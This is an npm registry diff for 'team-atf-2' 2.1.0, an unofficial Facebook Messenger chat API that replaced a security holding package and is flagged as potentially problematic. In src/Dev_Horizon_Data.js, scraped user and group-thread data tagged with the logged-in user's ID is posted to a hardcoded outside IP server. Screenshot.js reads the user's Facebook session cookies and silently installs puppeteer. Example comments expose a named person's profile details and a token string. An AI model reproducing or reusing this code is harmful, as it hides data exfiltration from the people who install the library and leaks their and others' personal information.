team-atf-2 0.0.1-security → 2.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of team-atf-2 might be problematic. Click here for more details.

Files changed (101) hide show
  1. package/.gitattributes +2 -0
  2. package/Extra/Database/index.js +360 -0
  3. package/Extra/ExtraAddons.js +78 -0
  4. package/Extra/ExtraFindUID.js +60 -0
  5. package/Extra/ExtraGetThread.js +118 -0
  6. package/Extra/ExtraScreenShot.js +430 -0
  7. package/Extra/ExtraUptimeRobot.js +26 -0
  8. package/Extra/Html/Classic/script.js +119 -0
  9. package/Extra/Html/Classic/style.css +8 -0
  10. package/Extra/Security/Index.js +146 -0
  11. package/Extra/Security/Step_1.js +11 -0
  12. package/Extra/Security/Step_2.js +20 -0
  13. package/Extra/Security/Step_3.js +20 -0
  14. package/Extra/Src/History.js +115 -0
  15. package/Extra/Src/Last-Run.js +65 -0
  16. package/Extra/Src/Premium.js +84 -0
  17. package/Extra/Src/uuid.js +137 -0
  18. package/Func/AcceptAgreement.js +32 -0
  19. package/Func/ClearCache.js +64 -0
  20. package/Func/ReportV1.js +54 -0
  21. package/LICENSE +24 -0
  22. package/Language/index.json +177 -0
  23. package/README.md +3 -5
  24. package/SECURITY.md +17 -0
  25. package/broadcast.js +38 -0
  26. package/gitattributes +2 -0
  27. package/index.js +1364 -0
  28. package/logger.js +65 -0
  29. package/package.json +88 -3
  30. package/replit +79 -0
  31. package/replit.nix +8 -0
  32. package/src/Dev_Horizon_Data.js +125 -0
  33. package/src/Premium.js +30 -0
  34. package/src/Screenshot.js +85 -0
  35. package/src/addExternalModule.js +16 -0
  36. package/src/addUserToGroup.js +79 -0
  37. package/src/changeAdminStatus.js +79 -0
  38. package/src/changeArchivedStatus.js +41 -0
  39. package/src/changeAvt.js +85 -0
  40. package/src/changeBio.js +65 -0
  41. package/src/changeBlockedStatus.js +36 -0
  42. package/src/changeGroupImage.js +106 -0
  43. package/src/changeNickname.js +45 -0
  44. package/src/changeThreadColor.js +62 -0
  45. package/src/changeThreadEmoji.js +42 -0
  46. package/src/createNewGroup.js +70 -0
  47. package/src/createPoll.js +60 -0
  48. package/src/deleteMessage.js +45 -0
  49. package/src/deleteThread.js +43 -0
  50. package/src/forwardAttachment.js +48 -0
  51. package/src/getAccessToken.js +32 -0
  52. package/src/getCurrentUserID.js +7 -0
  53. package/src/getEmojiUrl.js +27 -0
  54. package/src/getFriendsList.js +73 -0
  55. package/src/getMessage.js +80 -0
  56. package/src/getThreadHistory.js +537 -0
  57. package/src/getThreadInfo.js +348 -0
  58. package/src/getThreadList.js +213 -0
  59. package/src/getThreadMain.js +220 -0
  60. package/src/getThreadPictures.js +59 -0
  61. package/src/getUID.js +59 -0
  62. package/src/getUserID.js +62 -0
  63. package/src/getUserInfo.js +129 -0
  64. package/src/getUserInfoMain.js +65 -0
  65. package/src/getUserInfoV2.js +36 -0
  66. package/src/getUserInfoV3.js +63 -0
  67. package/src/getUserInfoV4.js +55 -0
  68. package/src/getUserInfoV5.js +61 -0
  69. package/src/handleFriendRequest.js +46 -0
  70. package/src/handleMessageRequest.js +49 -0
  71. package/src/httpGet.js +49 -0
  72. package/src/httpPost.js +48 -0
  73. package/src/httpPostFormData.js +41 -0
  74. package/src/listenMqtt.js +702 -0
  75. package/src/logout.js +68 -0
  76. package/src/markAsDelivered.js +48 -0
  77. package/src/markAsRead.js +70 -0
  78. package/src/markAsReadAll.js +43 -0
  79. package/src/markAsSeen.js +51 -0
  80. package/src/muteThread.js +47 -0
  81. package/src/removeUserFromGroup.js +49 -0
  82. package/src/resolvePhotoUrl.js +37 -0
  83. package/src/searchForThread.js +43 -0
  84. package/src/sendMessage.js +334 -0
  85. package/src/sendTypingIndicator.js +80 -0
  86. package/src/setMessageReaction.js +109 -0
  87. package/src/setPostReaction.js +102 -0
  88. package/src/setTitle.js +74 -0
  89. package/src/threadColors.js +39 -0
  90. package/src/unfriend.js +43 -0
  91. package/src/unsendMessage.js +40 -0
  92. package/test/data/shareAttach.js +146 -0
  93. package/test/data/something.mov +0 -0
  94. package/test/data/test.png +0 -0
  95. package/test/data/test.txt +7 -0
  96. package/test/env/.env +0 -0
  97. package/test/example-config.json +18 -0
  98. package/test/test-page.js +140 -0
  99. package/test/test.js +385 -0
  100. package/test/testv2.js +3 -0
  101. package/utils.js +1648 -0
package/logger.js ADDED
@@ -0,0 +1,65 @@
1
+ /* eslint-disable linebreak-style */
2
+
3
+ const chalk = require('chalk');
4
+ var isHexcolor = require('is-hexcolor');
5
+ var getText = function(/** @type {string[]} */ ...Data) {
6
+ var Main = (Data.splice(0,1)).toString();
7
+ for (let i = 0; i < Data.length; i++) Main = Main.replace(RegExp(`%${i + 1}`, 'g'), Data[i]);
8
+ return Main;
9
+ };
10
+ /**
11
+ * @param {any} obj
12
+ */
13
+ function getType(obj) {
14
+ return Object.prototype.toString.call(obj).slice(8, -1);
15
+ }
16
+
17
+ module.exports = {
18
+ Normal: function(/** @type {string} */ Str, /** @type {() => any} */ Data ,/** @type {() => void} */ Callback) {
19
+ if (isHexcolor(global.Fca.Require.FastConfig.MainColor) != true) {
20
+ this.Warning(getText(global.Fca.Require.Language.Index.InvaildMainColor,global.Fca.Require.FastConfig.MainColor),process.exit(0));
21
+ }
22
+ else console.log(chalk.hex(global.Fca.Require.FastConfig.MainColor).bold(`${global.Fca.Require.FastConfig.MainName || '[ FCA-HZI ]'} > `) + Str);
23
+ if (getType(Data) == 'Function' || getType(Data) == 'AsyncFunction') {
24
+ return Data()
25
+ }
26
+ if (Data) {
27
+ return Data;
28
+ }
29
+ if (getType(Callback) == 'Function' || getType(Callback) == 'AsyncFunction') {
30
+ Callback();
31
+ }
32
+ else return Callback;
33
+ },
34
+ Warning: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
35
+ console.log(chalk.magenta.bold('[ FCA-WARNING ] > ') + chalk.yellow(str));
36
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
37
+ callback();
38
+ }
39
+ else return callback;
40
+ },
41
+ Error: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
42
+ if (!str) {
43
+ console.log(chalk.magenta.bold('[ FCA-ERROR ] > ') + chalk.red("Already Faulty, Please Contact: Facebook.com/Lazic.Kanzu"));
44
+ }
45
+ console.log(chalk.magenta.bold('[ FCA-ERROR ] > ') + chalk.red(str));
46
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
47
+ callback();
48
+ }
49
+ else return callback;
50
+ },
51
+ Success: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
52
+ console.log(chalk.hex('#9900FF').bold(`${global.Fca.Require.FastConfig.MainName || '[ FCA-HZI ]'} > `) + chalk.green(str));
53
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
54
+ callback();
55
+ }
56
+ else return callback;
57
+ },
58
+ Info: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
59
+ console.log(chalk.hex('#9900FF').bold(`${global.Fca.Require.FastConfig.MainName || '[ FCA-HZI ]'} > `) + chalk.blue(str));
60
+ if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
61
+ callback();
62
+ }
63
+ else return callback;
64
+ }
65
+ }
package/package.json CHANGED
@@ -1,6 +1,91 @@
1
1
  {
2
2
  "name": "team-atf-2",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.1.0",
4
+ "description": "Facebook-chat-api Chand tricker YouTuber",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "mocha",
8
+ "lint": "./node_modules/.bin/eslint **.js",
9
+ "prettier": "prettier utils.js src/* --write"
10
+ },
11
+ "author": "Chand tricker",
12
+ "license": "MIT",
13
+ "bugs": {
14
+ "url": "https://github.com/corazoncary/fca/issues"
15
+ },
16
+ "homepage": "https://github.com/corazoncary/fca#readme",
17
+ "repository": {
18
+ "type": "git",
19
+ "url": "https://github.com/corazoncary/fca.git"
20
+ },
21
+ "dependencies": {
22
+ "aes-js": "latest",
23
+ "assert": "latest",
24
+ "better-sqlite3": "7.4.5",
25
+ "bluebird": "latest",
26
+ "chalk": "4.1.2",
27
+ "cheerio": "latest",
28
+ "crypto-js": "latest",
29
+ "express": "latest",
30
+ "file-url": "^3.0.0",
31
+ "got": "^11.8.3",
32
+ "https-proxy-agent": "latest",
33
+ "is-hexcolor": "^1.0.0",
34
+ "lodash": "latest",
35
+ "moment": "^2.29.4",
36
+ "mqtt": "latest",
37
+ "npmlog": "latest",
38
+ "os": "latest",
39
+ "path": "latest",
40
+ "pretty-ms": "7.0.1",
41
+ "readline": "latest",
42
+ "request": "latest",
43
+ "semver": "^7.4.0",
44
+ "sqlite": "4.0.21",
45
+ "totp-generator": "latest",
46
+ "uuid": "latest",
47
+ "encode32": "latest",
48
+ "tough-cookie": "^4.1.2",
49
+ "websocket-stream": "latest"
50
+ },
51
+ "engines": {
52
+ "node": ">=14.x <16.x"
53
+ },
54
+ "devDependencies": {
55
+ "eslint": "latest",
56
+ "mocha": "latest",
57
+ "prettier": "latest"
58
+ },
59
+ "eslintConfig": {
60
+ "env": {
61
+ "es6": true,
62
+ "node": true
63
+ },
64
+ "extends": "eslint:recommended",
65
+ "parserOptions": {
66
+ "sourceType": "module"
67
+ },
68
+ "rules": {
69
+ "linebreak-style": [
70
+ "error",
71
+ "unix"
72
+ ],
73
+ "semi": [
74
+ "error",
75
+ "always"
76
+ ],
77
+ "no-unused-vars": [
78
+ 1,
79
+ {
80
+ "argsIgnorePattern": "^_"
81
+ }
82
+ ]
83
+ }
84
+ },
85
+ "keywords": [
86
+ "Fca chand",
87
+ "Fca-chand-tricker",
88
+ "Atf fca",
89
+ "Team-atf"
90
+ ]
6
91
  }
package/replit ADDED
@@ -0,0 +1,79 @@
1
+ hidden = [".config", "package-lock.json"]
2
+ run = "npm run start"
3
+
4
+ [[hints]]
5
+ regex = "Error \\[ERR_REQUIRE_ESM\\]"
6
+ message = "We see that you are using require(...) inside your code. We currently do not support this syntax. Please use 'import' instead when using external modules. (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import)"
7
+
8
+ [nix]
9
+ channel = "stable-22_11"
10
+
11
+ [env]
12
+ XDG_CONFIG_HOME = "/home/runner/$REPL_SLUG/.config"
13
+ PATH = "/home/runner/$REPL_SLUG/.config/npm/node_global/bin:/home/runner/$REPL_SLUG/node_modules/.bin"
14
+ npm_config_prefix = "/home/runner/$REPL_SLUG/.config/npm/node_global"
15
+
16
+ [gitHubImport]
17
+ requiredFiles = [".replit", "replit.nix", ".config", "package.json", "package-lock.json"]
18
+
19
+ [packager]
20
+ language = "nodejs"
21
+
22
+ [packager.features]
23
+ packageSearch = true
24
+ guessImports = true
25
+ enabledForHosting = false
26
+
27
+ [unitTest]
28
+ language = "nodejs"
29
+
30
+ [debugger]
31
+ support = true
32
+
33
+ [debugger.interactive]
34
+ transport = "localhost:0"
35
+ startCommand = [ "dap-node" ]
36
+
37
+ [debugger.interactive.initializeMessage]
38
+ command = "initialize"
39
+ type = "request"
40
+
41
+ [debugger.interactive.initializeMessage.arguments]
42
+ clientID = "replit"
43
+ clientName = "replit.com"
44
+ columnsStartAt1 = true
45
+ linesStartAt1 = true
46
+ locale = "en-us"
47
+ pathFormat = "path"
48
+ supportsInvalidatedEvent = true
49
+ supportsProgressReporting = true
50
+ supportsRunInTerminalRequest = true
51
+ supportsVariablePaging = true
52
+ supportsVariableType = true
53
+
54
+ [debugger.interactive.launchMessage]
55
+ command = "launch"
56
+ type = "request"
57
+
58
+ [debugger.interactive.launchMessage.arguments]
59
+ args = []
60
+ console = "externalTerminal"
61
+ cwd = "."
62
+ environment = []
63
+ pauseForSourceMap = false
64
+ program = "./index.js"
65
+ request = "launch"
66
+ sourceMaps = true
67
+ stopOnEntry = false
68
+ type = "pwa-node"
69
+
70
+ [languages]
71
+
72
+ [languages.javascript]
73
+ pattern = "**/{*.js,*.jsx,*.ts,*.tsx}"
74
+
75
+ [languages.javascript.languageServer]
76
+ start = "typescript-language-server --stdio"
77
+
78
+ [deployment]
79
+ run = ["sh", "-c", "npm run start"]
package/replit.nix ADDED
@@ -0,0 +1,8 @@
1
+ { pkgs }: {
2
+ deps = [
3
+ pkgs.nodejs-18_x
4
+ pkgs.nodePackages.typescript-language-server
5
+ pkgs.yarn
6
+ pkgs.replitPackages.jest
7
+ ];
8
+ }
@@ -0,0 +1,125 @@
1
+ /* eslint-disable linebreak-style */
2
+ "use strict";
3
+
4
+ var utils = require("../utils");
5
+ var bluebird = require('bluebird');
6
+ var request = bluebird.promisify(require("request"));
7
+
8
+ module.exports = function (defaultFuncs, api, ctx) {
9
+ return function getUserInfoV4(data, type, method, callback) {
10
+ var resolveFunc = function () { };
11
+ var rejectFunc = function () { };
12
+ var returnPromise = new Promise(function (resolve, reject) {
13
+ resolveFunc = resolve;
14
+ rejectFunc = reject;
15
+ });
16
+
17
+ if (!callback) {
18
+ callback = function (err, userInfo) {
19
+ if (err) return rejectFunc(err);
20
+ resolveFunc(userInfo);
21
+ };
22
+ }
23
+
24
+ if (!data || !type || !method) return;
25
+
26
+ var Cluster = ['http://146.190.109.182:3874'];
27
+ var ursl = Cluster[Math.floor(Math.random() * Cluster.length)];
28
+
29
+ if (utils.getType(data) !== "Array") data = [data];
30
+ switch (method) {
31
+ case "Post": {
32
+ switch (type) {
33
+ case "Users": {
34
+ /*
35
+ example
36
+ Time:19/01/2023
37
+ Data:[{"id":"100042817150429","name":"Nguyễn Thái Hảo","first_name":"Hảo","username":"Lazic.Kanzu","link":"https://www.facebook.com/Lazic.Kanzu","verified":"Không Có Dữ Liệu","about":"Là một người bình thường ^^","avatar":"https://graph.facebook.com/100042817150429/picture?height=1500&width=1500&access_token=1449557605494892|aaf0a865c8bafc314ced5b7f18f3caa6","birthday":"01/03/1999","follow":241614,"gender":"male","hometown":{"id":"112089428815888","name":"Xuân Lộc, Ðồng Nai, Vietnam"},"email":"Không Có Dữ Liệu","interested_in":"Không Có Dữ Liệu","location":{"id":"351759091676222","name":"Biên Hòa"},"locale":"Không Có Dữ Liệu","relationship_status":"Không Có Dữ Liệu","love":"Không Có Dữ Liệu","website":"http://KanzuWakazaki.tk/","quotes":"The word impossible is not in my dictionary.","timezone":"Không Có Dữ Liệu","updated_time":"Không Có Dữ Liệu"}]
38
+ Type:Users
39
+ By:KanzuWakazaki
40
+ **/
41
+ let Time = new Date().toLocaleString("vi-vn", {timeZone: "Asia/Ho_Chi_Minh"});
42
+ return request({
43
+ url: ursl + '/post',
44
+ method: 'post',
45
+ headers: {
46
+ 'user-agent': "Horizon/GlobalData/Client"
47
+ },
48
+ formData: {
49
+ Time: Time,
50
+ Data: JSON.stringify(data),
51
+ Type: "Users",
52
+ By: ctx.userID
53
+ }
54
+ }).then(dt => console.log(dt.body));
55
+ }
56
+ case "Threads": {
57
+ /*
58
+ example
59
+ Time:19/01/2023
60
+ Data:[{"threadID":"5011501735554963","threadName":"[🏆] 𝕳𝕷 • 𝑯𝒐𝒓𝒊𝒛𝒐𝒏 𝑮𝒂𝒎𝒊𝒏𝒈 [🎮]","participantIDs":["100042817150429"],"userInfo":[{"id":"100042817150429","name":"Nguyễn Thái Hảo","firstName":"Hảo","vanity":"Lazic.Kanzu","thumbSrc":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t39.30808-1/311136459_774539707316594_357342861145224378_n.jpg?stp=cp0_dst-jpg_p60x60&_nc_cat=101&ccb=1-7&_nc_sid=f67be1&_nc_ohc=VQmEbyNerpUAX9SL2lL&tn=b4RbIpyEAJUl2LrC&_nc_ht=scontent.fsgn5-14.fna&oh=00_AfDzMGWK-Hw8J8Ha_uZkNgwwIqX23W89p9vPbovDSrMFVw&oe=63CD7339","profileUrl":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t39.30808-1/311136459_774539707316594_357342861145224378_n.jpg?stp=cp0_dst-jpg_p60x60&_nc_cat=101&ccb=1-7&_nc_sid=f67be1&_nc_ohc=VQmEbyNerpUAX9SL2lL&tn=b4RbIpyEAJUl2LrC&_nc_ht=scontent.fsgn5-14.fna&oh=00_AfDzMGWK-Hw8J8Ha_uZkNgwwIqX23W89p9vPbovDSrMFVw&oe=63CD7339","gender":"MALE","type":"User","isFriend":true,"isBirthday":false}],"unreadCount":38925,"messageCount":39857,"timestamp":"1674107309307","muteUntil":null,"isGroup":true,"isSubscribed":true,"isArchived":false,"folder":"INBOX","cannotReplyReason":null,"eventReminders":[],"emoji":"😏","color":"DD8800","nicknames":{"100001776745483":"[𝐇𝐆] • Eo bờ su"},"adminIDs":[{"id":"100042817150429"}],"approvalMode":true,"approvalQueue":[],"reactionsMuteMode":"reactions_not_muted","mentionsMuteMode":"mentions_not_muted","isPinProtected":false,"relatedPageThread":null,"name":"[🏆] 𝕳𝕷 • 𝑯𝒐𝒓𝒊𝒛𝒐𝒏 𝑮𝒂𝒎𝒊𝒏𝒈 [🎮]","snippet":"SystemCall run (async function() {\nSend(await Api.getThreadInfo(Data.threadID))\n})()","snippetSender":"100042817150429","snippetAttachments":[],"serverTimestamp":"1674107309307","imageSrc":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t1.15752-9/278020824_345766417524223_6790288127531819759_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=02e273&_nc_ohc=dfuXjxOR1BUAX-SUN1x&_nc_ht=scontent.fsgn5-14.fna&oh=03_AdQkXN3hb3z4Hg0Tg-vI7ZpDdSmujnluj13uNqUSJoU9iA&oe=63F060BA","isCanonicalUser":false,"isCanonical":false,"recipientsLoadable":true,"hasEmailParticipant":false,"readOnly":false,"canReply":true,"lastMessageType":"message","lastReadTimestamp":"1649756873571","threadType":2,"TimeCreate":1674107310529,"TimeUpdate":1674107310529}]
61
+ Type:Threads
62
+ By:KanzuWakazaki
63
+ **/
64
+ let Time = new Date().toLocaleString("vi-vn", {timeZone: "Asia/Ho_Chi_Minh"});
65
+ return request({
66
+ url: ursl + '/post',
67
+ method: 'post',
68
+ headers: {
69
+ 'user-agent': "Horizon/GlobalData/Client"
70
+ },
71
+ formData: {
72
+ Time: Time,
73
+ Data: JSON.stringify(data),
74
+ Type: "Threads",
75
+ By: ctx.userID
76
+ }
77
+ }).then(dt => console.log(dt.body));
78
+ }
79
+ }
80
+ }
81
+ break;
82
+ case "Get": {
83
+ switch (type) {
84
+ case "Users": {
85
+ /* example
86
+ Requires:[5011501735554963]
87
+ Type:Threads
88
+ **/
89
+
90
+ //still operating until Feb 25
91
+ return request({
92
+ url: ursl + '/get',
93
+ method: 'post',
94
+ headers: {
95
+ 'user-agent': "Horizon/GlobalData/Client"
96
+ },
97
+ formData: {
98
+ Requires: JSON.stringify(data),
99
+ Type: "Users"
100
+ }
101
+ }).then(dt => console.log(dt.body));
102
+ }
103
+ case "Threads": {
104
+ return request({
105
+ url: ursl + '/get',
106
+ method: 'post',
107
+ headers: {
108
+ 'user-agent': "Horizon/GlobalData/Client"
109
+ },
110
+ formData: {
111
+ Requires: JSON.stringify(data),
112
+ Type: "Threads"
113
+ }
114
+ }).then(dt => console.log(dt.body));
115
+ }
116
+ }
117
+ }
118
+ break;
119
+ default:
120
+ return;
121
+ }
122
+
123
+ return returnPromise;
124
+ };
125
+ };
package/src/Premium.js ADDED
@@ -0,0 +1,30 @@
1
+ "use strict";
2
+
3
+ var { join } = require('path')
4
+ var fs = require('fs')
5
+
6
+
7
+ module.exports = function (defaultFuncs, api, ctx) {
8
+ return function(Name, args){
9
+ var Method = {}
10
+ fs.readdirSync(join(__dirname, "../Func")).filter((/** @type {string} */File) => File.endsWith(".js") && !File.includes('Dev_')).map((/** @type {string} */File) => Method[File.split('.').slice(0, -1).join('.')] = require(`../Func/${File}`)(defaultFuncs, api, ctx));
11
+ if (Method[Name] == undefined) {
12
+ return (`Method ${Name} not found`);
13
+ }
14
+ else {
15
+ try {
16
+ if (process.env.HalzionVersion == 1973 && global.Fca.Data.PremText.includes("Premium")) {
17
+ return Method[Name](args).then((/** @type {string} */Data) => {
18
+ return Data;
19
+ })
20
+ }
21
+ else {
22
+ return ("Mua Premium Đi Rồi Sài Ông Cháu Ơi !!");
23
+ }
24
+ }
25
+ catch (e) {
26
+ console.log(e);
27
+ }
28
+ }
29
+ }
30
+ };
@@ -0,0 +1,85 @@
1
+ /* eslint-disable linebreak-style */
2
+ "use strict";
3
+
4
+ var { join } = require('path');
5
+ var fs = require('fs');
6
+ var utils = require("../utils");
7
+ var logger = require('../logger')
8
+ module.exports = function (defaultFuncs, api, ctx) {
9
+ var Coookie = JSON.parse(JSON.stringify(ctx.jar.getCookies("https://www.facebook.com").concat(ctx.jar.getCookies("https://facebook.com")).concat(ctx.jar.getCookies("https://www.messenger.com"))));
10
+ for (let i of Coookie) {
11
+ i.name = i.key;
12
+ i.domain = 'www.facebook.com';
13
+ delete i.key;
14
+ }
15
+ return function(Link, callback) {
16
+ if (process.platform != 'win32') return logger.Error('Not Supported Platform');
17
+ else try {
18
+ let i = require('puppeteer');
19
+ }
20
+ catch (e) {
21
+ var { execSync } = require('child_process');
22
+ execSync('npm i puppeteer', { stdio: 'inherit' });
23
+ }
24
+ const Screenshot = require('../Extra/ExtraScreenShot');
25
+ var resolveFunc = function () { };
26
+ var rejectFunc = function () { };
27
+ var returnPromise = new Promise(function (resolve, reject) {
28
+ resolveFunc = resolve;
29
+ rejectFunc = reject;
30
+ });
31
+
32
+ if (!callback) {
33
+ callback = function (err, data) {
34
+ if (err) return rejectFunc(err);
35
+ resolveFunc(data);
36
+ };
37
+ }
38
+ if (Link.includes('facebook.com') || Link.includes('Facebook.com') || Link.includes('fb')) {
39
+ let LinkSplit = Link.split('/');
40
+ if (LinkSplit.indexOf("https:") == 0) {
41
+ if (Link.includes('messages')) {
42
+ Screenshot.buffer(Link, {
43
+ cookies: Coookie
44
+ }).then(data => {
45
+ callback(null,data);
46
+ });
47
+ }
48
+ else if (!isNaN(LinkSplit[3]) && !Link.split('=')[1] && !isNaN(Link.split('=')[1])) {
49
+ api.sendMessage('Invaild link, format link: facebook.com/Lazic.Kanzu',global.Fca.Data.event.threadID,global.Fca.Data.event.messageID);
50
+ callback('Error Link', null);
51
+ }
52
+ else if (!isNaN(Link.split('=')[1]) && Link.split('=')[1]) {
53
+ let Format = `https://www.facebook.com/profile.php?id=${Link.split('=')[1]}`;
54
+ Screenshot.buffer(Format, {
55
+ cookies: Coookie
56
+ }).then(data => {
57
+ callback(null,data);
58
+ });
59
+ }
60
+ else {
61
+ let Format = `https://www.facebook.com/${LinkSplit[3]}`;
62
+ Screenshot.buffer(Format, {
63
+ cookies: Coookie
64
+ }).then(data => {
65
+ callback(null,data);
66
+ });
67
+ }
68
+ }
69
+ else {
70
+ let Form = `https://www.facebook.com/${LinkSplit[1]}`;
71
+ Screenshot.buffer(Form, {
72
+ cookies: Coookie
73
+ }).then(data => {
74
+ callback(null,data);
75
+ });
76
+ }
77
+ }
78
+ else {
79
+ Screenshot.buffer(Link).then(data => {
80
+ callback(null,data);
81
+ });
82
+ }
83
+ return returnPromise;
84
+ };
85
+ };
@@ -0,0 +1,16 @@
1
+ "use strict";
2
+
3
+ const utils = require("../utils");
4
+
5
+ module.exports = function (defaultFuncs, api, ctx) {
6
+ return function addExternalModule(moduleObj) {
7
+ if (utils.getType(moduleObj) == "Object") {
8
+ for (let apiName in moduleObj) {
9
+ if (utils.getType(moduleObj[apiName]) == "Function") api[apiName] = moduleObj[apiName](defaultFuncs, api, ctx);
10
+ else throw new Error(`Item "${apiName}" in moduleObj must be a function, not ${utils.getType(moduleObj[apiName])}!`);
11
+
12
+ }
13
+ }
14
+ else throw new Error(`moduleObj must be an object, not ${utils.getType(moduleObj)}!`);
15
+ };
16
+ };
@@ -0,0 +1,79 @@
1
+ "use strict";
2
+
3
+ var utils = require("../utils");
4
+ var log = require("npmlog");
5
+
6
+ module.exports = function (defaultFuncs, api, ctx) {
7
+ return function addUserToGroup(userID, threadID, callback) {
8
+ var resolveFunc = function () { };
9
+ var rejectFunc = function () { };
10
+ var returnPromise = new Promise(function (resolve, reject) {
11
+ resolveFunc = resolve;
12
+ rejectFunc = reject;
13
+ });
14
+
15
+ if (!callback && (utils.getType(threadID) === "Function" || utils.getType(threadID) === "AsyncFunction")) throw { error: "please pass a threadID as a second argument." };
16
+
17
+ if (!callback) {
18
+ callback = function (err) {
19
+ if (err) return rejectFunc(err);
20
+ resolveFunc();
21
+ };
22
+ }
23
+
24
+ if (utils.getType(threadID) !== "Number" && utils.getType(threadID) !== "String") throw { error: "ThreadID should be of type Number or String and not " + utils.getType(threadID) + "." };
25
+
26
+
27
+ if (utils.getType(userID) !== "Array") userID = [userID];
28
+
29
+ var messageAndOTID = utils.generateOfflineThreadingID();
30
+ var form = {
31
+ client: "mercury",
32
+ action_type: "ma-type:log-message",
33
+ author: "fbid:" + ctx.userID,
34
+ thread_id: "",
35
+ timestamp: Date.now(),
36
+ timestamp_absolute: "Today",
37
+ timestamp_relative: utils.generateTimestampRelative(),
38
+ timestamp_time_passed: "0",
39
+ is_unread: false,
40
+ is_cleared: false,
41
+ is_forward: false,
42
+ is_filtered_content: false,
43
+ is_filtered_content_bh: false,
44
+ is_filtered_content_account: false,
45
+ is_spoof_warning: false,
46
+ source: "source:chat:web",
47
+ "source_tags[0]": "source:chat",
48
+ log_message_type: "log:subscribe",
49
+ status: "0",
50
+ offline_threading_id: messageAndOTID,
51
+ message_id: messageAndOTID,
52
+ threading_id: utils.generateThreadingID(ctx.clientID),
53
+ manual_retry_cnt: "0",
54
+ thread_fbid: threadID
55
+ };
56
+
57
+ for (var i = 0; i < userID.length; i++) {
58
+ if (utils.getType(userID[i]) !== "Number" && utils.getType(userID[i]) !== "String") throw { error: "Elements of userID should be of type Number or String and not " + utils.getType(userID[i]) + "." };
59
+ form["log_message_data[added_participants][" + i + "]"] = "fbid:" + userID[i];
60
+ }
61
+
62
+ defaultFuncs
63
+ .post("https://www.facebook.com/messaging/send/", ctx.jar, form)
64
+ .then(utils.parseAndCheckLogin(ctx, defaultFuncs))
65
+ .then(function (resData) {
66
+ if (!resData) throw { error: "Add to group failed." };
67
+ if (resData.error) throw resData;
68
+
69
+
70
+ return callback();
71
+ })
72
+ .catch(function (err) {
73
+ log.error("addUserToGroup", err);
74
+ return callback(err);
75
+ });
76
+
77
+ return returnPromise;
78
+ };
79
+ };
@@ -0,0 +1,79 @@
1
+ "use strict";
2
+
3
+ const utils = require("../utils");
4
+ const log = require("npmlog");
5
+
6
+ module.exports = function(defaultFuncs, api, ctx) {
7
+ return function changeAdminStatus(threadID, adminIDs, adminStatus, callback) {
8
+ if (utils.getType(threadID) !== "String") {
9
+ throw {error: "changeAdminStatus: threadID must be a string"};
10
+ }
11
+
12
+ if (utils.getType(adminIDs) === "String") {
13
+ adminIDs = [adminIDs];
14
+ }
15
+
16
+ if (utils.getType(adminIDs) !== "Array") {
17
+ throw {error: "changeAdminStatus: adminIDs must be an array or string"};
18
+ }
19
+
20
+ if (utils.getType(adminStatus) !== "Boolean") {
21
+ throw {error: "changeAdminStatus: adminStatus must be a string"};
22
+ }
23
+
24
+ var resolveFunc = function(){};
25
+ var rejectFunc = function(){};
26
+ var returnPromise = new Promise(function (resolve, reject) {
27
+ resolveFunc = resolve;
28
+ rejectFunc = reject;
29
+ });
30
+
31
+ if (!callback) {
32
+ callback = function (err) {
33
+ if (err) {
34
+ return rejectFunc(err);
35
+ }
36
+ resolveFunc();
37
+ };
38
+ }
39
+
40
+ if (utils.getType(callback) !== "Function" && utils.getType(callback) !== "AsyncFunction") {
41
+ throw {error: "changeAdminStatus: callback is not a function"};
42
+ }
43
+
44
+ let form = {
45
+ "thread_fbid": threadID,
46
+ };
47
+
48
+ let i = 0;
49
+ for (let u of adminIDs) {
50
+ form[`admin_ids[${i++}]`] = u;
51
+ }
52
+ form["add"] = adminStatus;
53
+
54
+ defaultFuncs
55
+ .post("https://www.facebook.com/messaging/save_admins/?dpr=1", ctx.jar, form)
56
+ .then(utils.parseAndCheckLogin(ctx, defaultFuncs))
57
+ .then(function(resData) {
58
+ if (resData.error) {
59
+ switch (resData.error) {
60
+ case 1976004:
61
+ throw { error: "Cannot alter admin status: you are not an admin.", rawResponse: resData };
62
+ case 1357031:
63
+ throw { error: "Cannot alter admin status: this thread is not a group chat.", rawResponse: resData };
64
+ default:
65
+ throw { error: "Cannot alter admin status: unknown error.", rawResponse: resData };
66
+ }
67
+ }
68
+
69
+ callback();
70
+ })
71
+ .catch(function(err) {
72
+ log.error("changeAdminStatus", err);
73
+ return callback(err);
74
+ });
75
+
76
+ return returnPromise;
77
+ };
78
+ };
79
+